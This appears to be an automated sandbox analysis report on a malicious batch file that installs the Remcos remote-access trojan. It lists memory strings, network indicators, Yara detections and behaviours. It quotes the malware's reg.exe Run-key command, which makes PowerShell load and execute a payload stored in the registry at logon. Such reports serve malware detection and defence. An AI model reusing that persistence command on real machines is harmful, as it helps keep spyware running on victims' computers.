Source: bhv68C0.tmp.13.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1943655705.00000267B0D5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: powershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041183A OpenClipboard,GetLastError, 13_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 15_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 16_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_3980.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401806 NtdllDefWindowProc_W, 13_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004018C0 NtdllDefWindowProc_W, 13_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004016FD NtdllDefWindowProc_A, 15_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004017B7 NtdllDefWindowProc_A, 15_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00402CAC NtdllDefWindowProc_A, 16_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00402D66 NtdllDefWindowProc_A, 16_2_00402D66
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B6FC452 2_2_00007FFD9B6FC452
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B6FB296 2_2_00007FFD9B6FB296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B7CA98A 2_2_00007FFD9B7CA98A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B7CB19A 2_2_00007FFD9B7CB19A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488F320 6_2_0488F320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488FBF0 6_2_0488FBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488EFCC 6_2_0488EFCC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488EFD8 6_2_0488EFD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488F314 6_2_0488F314
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F5B5C1 9_2_21F5B5C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F67194 9_2_21F67194
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B040 13_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043610D 13_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00447310 13_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A490 13_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040755A 13_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043C560 13_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B610 13_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044D6C0 13_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004476F0 13_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B870 13_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044081D 13_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414957 13_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004079EE 13_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407AEB 13_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044AA80 13_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00412AA9 13_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404B74 13_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404B03 13_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044BBD8 13_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404BE5 13_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404C76 13_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00415CFE 13_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00416D72 13_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446D30 13_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446D8B 13_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406E8F 13_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00405038 15_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041208C 15_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004050A9 15_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040511A 15_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043C13A 15_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004051AB 15_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00449300 15_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040D322 15_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A4F0 15_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043A5AB 15_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00413631 15_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446690 15_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A730 15_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004398D8 15_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004498E0 15_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A886 15_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043DA09 15_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00438D5E 15_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00449ED0 15_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041FE83 15_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00430F54 15_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004050C2 16_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004014AB 16_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00405133 16_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004051A4 16_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00401246 16_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0040CA46 16_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00405235 16_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004032C8 16_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00401689 16_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00402F60 16_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5866
Source: unknown Process created: Commandline size = 5890
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5866 Jump to behavior
Yara signature match
Source: amsi32_3980.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@22/13@3/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 13_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 16_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 13_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 13_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 13_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Rgnes.Und Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLW
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xio0a2hk.sne.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6112
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
